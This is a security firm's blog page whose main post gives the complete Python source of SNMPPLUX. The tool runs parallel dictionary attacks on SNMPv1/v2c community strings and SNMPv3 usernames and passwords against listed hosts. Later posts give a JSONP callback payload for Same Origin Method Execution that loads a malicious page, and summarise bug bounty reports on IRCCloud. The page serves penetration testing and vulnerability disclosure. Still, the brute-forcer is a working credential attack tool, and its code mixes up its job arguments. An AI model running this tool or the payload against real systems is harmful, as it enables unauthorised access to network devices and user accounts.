Skip to content

SNMPPLUX

snmpplux

Pentura continually develop new tools and scripts to improve the effectiveness of the team. One such tool called SNMPPLUX is an offshoot of a larger development project (ORR).
SNMPPLUX is a USM compliant SNMPv1, SNMPv2c and SNMPv3 authentication scanner powered by pysnmp, re, sys, getopt, array, time and multiprocessing python modules.
As well as providing SNMPv1 and v2c community dictionary attacks is will also provide username and password dictionary attacks for SNMPv3 for the following authentication types:
• SNMPv3 Auth None
• SNMPv3 Auth MD5 Priv None
• SNMPv3 Auth MD5 Priv DES
• SNMPv3 Auth SHA Priv AES128
• SNMPv3 Auth SHA Priv AES192
• SNMPv3 Auth SHA Priv AES256
• SNMPv3 Auth SHA Priv DES
• SNMPv3 Auth SHA Priv 3DES

Whilst multiprocessing is currently used to speed up testing with parallel processes the future plans. A library version of this code is also utilised as part of the ORR project.

Screenshot from 2016-03-30 16_03_13

Screenshot showing example operation The current source code for this tool is included below on an as is basis. It may need to be reformatted to remove syntax and indenting errors introduced by providing the source in this format. Please see the License/Disclaimer below before using this software:

The source can also be downloaded from github:

https://github.com/PenturaLabs/SNMPPLUX

-----------------------snmpplux0.3.py source--------------------------------
from pysnmp.hlapi import *
import re
import sys, getopt
from array import *
import time
from multiprocessing import Pool

def banner():
        print ('.')
        print (' /   _____/ \      \    /     \\______    \______   \    |   |    |   \   \/  /')
        print (' \_____  \  /   |   \  /  \ /  \|     ___/|     ___/    |   |    |   /\     / ')
        print (' /        \/    |    \/    Y    \    |    |    |   |    |___|    |  / /     \ ')
        print ('/_______  /\____|__  /\____|__  /____|    |____|   |_______ \______/ /___/\  \ ')
        print ('        \/         \/         \/                           \/              \_/')
        print (' ')
        print ('Liam Romanis')
        print ('version 0.3b - beta testing')
        print ('http://www.pentura.com')
        print ('.')


def opts(argv):
    inputfile = ''
    userfile = ''
    passfile = ''
    try:
        opts, args = getopt.getopt(argv, 'i:u:p:h', ['ifile=', 'ufile=','pfile=','help'])
    except getopt.GetoptError:
        print ('test.py -i <inputfile> -u <userfile> -p <passfile> ')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print ('test.py -i <inputfile> -u <userfile> -p <passfile> ')
            sys.exit()
        elif opt in ('-i', '--ifile'):
            inputfile = arg
        elif opt in ('-u', '--ufile'):
            userfile = arg
        elif opt in ('-p', '--pfile'):
            passfile = arg

    return inputfile, userfile, passfile



def snmp1dict(ip, comm):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),CommunityData(comm, mpModel=0),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
        if errorIndication:
                pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv1: %s: Community:%s" %(ip,comm))



def snmp2dict(ip, comm):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),CommunityData(comm),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
        if errorIndication:
                pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv2: %s: Community:%s" %(ip,comm))
         


def snmp3_authNone_privNone(ip, user):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
                pass
        elif errorStatus:
                pass
        else:
                print ("SNMPv3 Auth None Priv None: %s: %s - no pass required\n" %(ip, user))



def snmp3_authMD5_privNone(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth MD5 Priv None: %s: %s:%s" % (ip, user, passwd))
    except:
        print ('exception caused by: %s:%s' % (user,passwd))
        pass

def snmp3_authMD5_privDES(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            sys.stdout.flush()
            print ("SNMPv3 Auth MD5 Priv DES: %s: %s:%s" % (ip,user,passwd))
    except:
        print ('exception caused by: %s:%s' % (user,passwd))
        pass

def snmp3_authSHA_privAES128(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb128Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES128: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb128Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb128Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privAES192(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb192Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES192: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb192Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb192Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privAES256(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb256Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES256: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb256Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb256Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privDES(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmDESPrivProtocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv DES: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmDESPrivProtocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmDESPrivProtocol' % (user,passwd))
        pass

def snmp3_authSHA_priv3DES(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usm3DESEDEPrivProtocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv 3DES: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usm3DESEDEPrivProtocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usm3DESEDEPrivProtocol' % (user,passwd))
        pass

def snmp12_helper(args):
    return snmp1dict(*args), snmp2dict(*args)

def snmp3none_helper(args):
    return snmp3_authNone_privNone(*args)

def snmp3md5none_helper(args):
    return snmp3_authMD5_privNone(*args), snmp3_authMD5_privDES(*args)

def snmp3shaaes_helper(args):
    return snmp3_authSHA_privAES128(*args), snmp3_authSHA_privAES192(*args), snmp3_authSHA_privAES256(*args), snmp3_authSHA_privDES(*args), snmp3_authSHA_priv3DES(*args)



if __name__ == "__main__":
    banner()
    inputfile, userfile, passfile = opts(sys.argv[1:])

    with open(inputfile, "r") as ins:
            targs = []
            for line in ins:
                    line = line.replace("\n", "")
                    targs.append(line)
            
    with open(userfile, "r") as ins:
            users= []
            for line in ins:
                    line = line.replace("\n", "")
                    users.append(line)

    with open(passfile, "r") as ins:
        passwords = []
        for line in ins:
            if (len(line) > 8):
                line = line.replace("\n", "")
                passwords.append(line)

    with open("dict.txt", "r") as ins:
        communities = []
        for line in ins:
            line = line.replace("\n", "")
            communities.append(line)

    p = Pool(20)
    job1_args = [(ip, comm) for comm in communities for ip in targs]
    p.map(snmp12_helper, job1_args)
    job2_args = [(ip, user) for user in users for ip in targs]
    p.map(snmp3none_helper, job1_args)
    job3_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords]
    p.map(snmp3md5none_helper, job3_args)
    job4_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords] 
    p.map(snmp3shaaes_helper, job4_args)

—————————————————————————–

LICENSE

Copyright ©2016 Pentura Ltd. This copyright applies to the Pentura codebase as a whole, or any individual distributed application. The individual contributions of government employees, which may be identified on a per-file basis are in the public domain. The software and content provided on this website are made available under the terms of the Apache License, Version 2.0. A copy of the License is available at:     http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

DISCLAIMER

THIS SOFTWARE AVAILABLE ON THE SITE http://www.pentura.com IS PROVIDED “AS IS” AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Pentura Ltd, OR ANY OF THEIR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Without limiting the foregoing, Pentura Ltd make no warranty that: •    the software will meet your requirements. •    the software will be uninterrupted, timely, secure or error-free. •    the results that may be obtained from the use of the software will be effective, accurate or reliable. •    the quality of the software will meet your expectations. •    any errors in the software obtained from the OpenSHA.org web site will be corrected. Software and its documentation made available on the http://www.pentura.com web site: •    could include technical or other mistakes, inaccuracies or typographical errors. Pentura contributors may make changes to the software or documentation made available on its web site. •    may be out of date and Pentura and its contributors make no commitment to update such materials. Pentura, and its contributors, assume no responsibility for errors or ommissions in the software or documentation available from the http://www.pentura.com web site. In no event shall Pentura, or it’s contributors be liable to you or any third parties for any special, punitive, incidental, indirect or consequential damages of any kind, or any damages whatsoever, including, without limitation, those resulting from loss of use, data or profits, whether or not Pentura and its contributors has been advised of the possibility of such damages, and on any theory of liability, arising out of or in connection with the use of this software. The use of the software downloaded through the http://www.pentura.com site is done at your own discretion and risk and with agreement that you will be solely responsible for any damage to your computer system or loss of data that results from such activities. No advice or information, whether oral or written, obtained by you from Pentura, its website or its contributors shall create any warranty for the software.

Finding and Exploiting Same Origin Method Execution vulnerabilities

Recently it came to my attention that it was possible to abuse JSONP callbacks using a vulnerability known as SOME – Same Origin Method Execution which can be used by an attacker to widely abuse a user’s trust between the web application and the intended flow of execution. For example, using the SOME attack it is possible for an attacker to trick a user to visiting a malicious web-page which contains a link to the host’s web application API with a JSONP callback parameter which the attacker can then control.

An example of this would be as follows:
http://example.com/api/get_user.json?id=1&callback=logResults

The above URL could be an example of a method for a third-party to obtain user accounts associated with the user ID 1 and would return something similar to the following:
logResults({"username": "admin", "email_address":"test@example.com"});

However, using the SOME attack it is possible to change the callback function to be anything that Javascript or the API recognises. An example of which could be the following:
http://example.com/api/get_user.json?id=1&callback=window.open('http://malicious.site/evil.php');//

Which would return something similar to the following:
window.open('http://malicious.site/evil.php');//({"username": "admin", "email_address":"test@example.com"});

Using this example the above URL would open a window from the user’s browser and direct them to http://malicious.site/evil.php (and prevent the rest of the response from being parsed) which could infect the user’s browser with a persistent XSS malware such as BeEF or similar.

A lot of web applications contain the Same Origin Policy headers which attempts to prevent attackers from loading pages or resources from external entities. However this attack bypasses this in two ways. The first way is that JSONP or JSON with Padding is expected to be used externally as that is what it was designed to be used for and the second way is that all calls to the resource is loaded from the same origin which means that the request never gets picked up from the Same Origin Policy.

Whilst performing some testing with this vulnerability, I found that it was also possible to abuse this vulnerability remotely by bypassing the Same Origin Policy using a few tricks such as loading the affected URL directly from an <img src=""> tag or a <script> tag which do not get prevented from the Same Origin Policy. This allows an attacker to perform virtually unlimited amount of actions on the application under the context of the unsuspecting victim user. These actions could range from stealing personal images, releasing data, stealing cookies or just performing malicious acts such as infecting the user with BeEF.

During this research I found that most of the major websites, including Microsoft, Facebook, Google, etc are all vulnerable to this type of attack. The one thing they all have in common is open-source Javascript frameworks from jQuery, PrototypeJS, AngularJS and more. These Javascript frameworks appear to allow for the SOME vulnerability to be present without any way of removing the functionality (easily).

SOME Example

[IRCCloud] History and Another XSS Bug Bounty

Personally, I have been a user of IRC since 2004 on some private networks and some other well-known ones such as Freenode. However, it was always inconvenient to have to set up an IRC Bouncer, so when IRCCloud came around, I was excited to try it and see if it provided me with a method of staying connected to all the required networks without having to download a new client on every computer I was on (as it’s a web service).

After trying the Beta which was a free option before they publicly released the paid version, I thought I’d try and find some vulnerabilities to report to them – for no other reason than to ensure that the service that I am using can’t be exploited to disclose any of my information or data.

The first issue I identified was that the application has a pastebin feature for when the user pastes a large amount of text, they get the option for uploading to their own proprietary pastebin service.

IRCCloud Pastebin

However, after performing some testing to execute javascript within the resulting pastebin link, it was found that it was possible to insert a new line (\n) and then a Cross Site Scripting payload, which got executed to full pre-authenticated Persistent Cross Site Scripting.

Read the full report on HackerOne.

[IRCCloud] Inadequate input validation on API endpoint leading to self denial of service and increased system load

So as you do, I was just looking around, manually fuzzing some Web Sockets requests, seeing if I could get any sort of XSS, Remote IRC Command Injection or SQLi mainly – ended up that I didn’t find much there that worse worth noting. So I started seeing if their logic was all alright, so one of their requests looked similar to:

{“_reqid”:1234, “cid”:5678, “to”: “#treehouse”, “msg”:”test”, “method”:”say”}

I thought, alright, what if I can send a message to multiple channels, so I changed the “to” parameter to be an array: “to”:[“#treehouse”, “#darkscience”] – Then all of a sudden my account gets disabled. So I booted up irssi and jumped on to the support channel to speak to the security engineers there. RJ (the one I spoke to) confirmed that the request put my account into an infinite loop attempting to send to a string-type channel but an array was given. This started filling up the internal queues and started increasing the RAM usage. He then fixed the issue with some difficulty. So as a report I submitted it to HackerOne just so they had a track of it.

With some further discussion with RJ and James (Another IRCCloud security engineer), it would have been possible to create multiple “test accounts” which would have been propagated over the other servers, performed the attack across the test accounts, which in turn may have brought down the servers due to lack of Disk Space or resources available.

IRCCloud were brilliant in dealing with the report, and the timely responses that were received by James, even when it was out of working hours, was by far the best that I had ever seen. *tilts hat to James*

Here is the full report issued to IRCCloud on HackerOne.

Most businesses do not understand data breach risks

by

Research by HP has uncovered a lack of understanding among businesses of the risks associated with data breaches. More than 70% of US and UK executives surveyed by the Ponemon Institute said that their organisation does not understand fully the dangers of breaches, while less than half of top executives and board members are kept informed about the response process.

The 2014 Executive Breach Preparedness Research Report was designed to highlight the importance of senior executive involvement in the response to data breaches.  While 79% of the nearly 500 senior executives polled agreed that executive-level involvement in the response process was necessary to a successful resolution, only 45% said that they were accountable for the process. The research also found that most executives are more concerned about threats from within their business than external attacks.

As we discussed last week, the financial cost of data breaches can be huge, not to mention the missed revenues due to reputational damage. This is why direction and leadership is needed from those at the top. Executives need to be aware of and actively involved in the data breach response process, and there needs to be a clear plan in place to prevent security incidents from escalating to a complete disaster for the company.

The Ponemon Institute noted that senior executives and board members may have been complacent about the effects of cyber-attacks and data breaches in the past, but are now gradually realising the damaging costs of such incidents. This is welcome news and we hope that senior executives will continue to take a more active role in their response to data breaches, educating themselves and their staff about the risks and start investing in the best security technology available.

Research Reveals Cost of Online Fraud to UK

by

This week has been Get Safe Online Week and to coincide with the event, the National Fraud Intelligence Bureau researched cyber-crime in the UK. The research found that over the last year, the ten biggest online scams cost victims over £670m – although the actual figure is thought to be significantly higher than that due to unreported crimes.

A separate poll found that while over half of Britons have been a victim of either online fraud, ID theft, hacking or online abuse, only a third of them reported the crime. One of the reasons for this is that many people did not know how to report the crime.  It is hoped that this will be improved by the development of Action Fraud, the UK’s national fraud reporting centre, and the increasing resources that the Government is dedicating to cyber-crime.

The research also suggests that cyber-crime is increasingly being taken more seriously by the British public. Around 53% said they now see it as a serious “physical world” crime and 42% stated that they are now more vigilant when shopping online. Despite this change in attitude, many people are still failing to take basic security measures with 67% of tablet owners and 54% of mobile phone owners in the survey not having a password or PIN to secure their device.

It’s good to see that initiatives like Get Safe Online Week and Action Fraud are raising awareness of online crimes and what people can do to prevent it. However, this research is a stark reminder of the dangers that we all face online. Online fraud continues to increase as crime overall falls, with criminals constantly developing new ways of targeting victims online.

At Pentura we believe that education is the key in the fight against cyber-crime. Our LearnwithPentura e-learning portal provides users with advice on security and best practice, with eight online modules ranging from email to removable media. Complacency is not an option, and businesses and authorities must continue to raise awareness of the dangers of online crime and educate users in cyber security.

Kmart hit by card hack attack

by

It’s been revealed that a data breach at US retail chain Kmart that compromised card details lasted over a month. The discount department store said that the malware was discovered last week but had been operating since early September. Based on its investigation so far, the company said that it believes credit and debit cards were exposed but that no personal information, PIN numbers, email addresses or social security numbers were accessed.

The incident is the latest in a string of cyber-attacks on American retailers. Last week, restaurant chain Dairy Queen revealed that hackers had stolen names, card numbers and expiration dates of around 600,000 cards across 395 of its restaurants. There have also been huge recent attacks on Home Depot, in which 56 million cards were affected, and on Target, when 40 million cards were compromised in the run-up to Christmas 213.

It’s not thought that the breached information is being used to create counterfeit cards or encumber customers with bills for items that they haven’t bought. Nevertheless, the attack is a reminder and a warning to retailers that the sheer size of their computer networks makes them an attractive target to hackers. By improving detection times, large chains will reduce the damage caused by such breaches and better protect both their customers and their reputation.

Follow

Get every new post delivered to your Inbox.

Join 171 other followers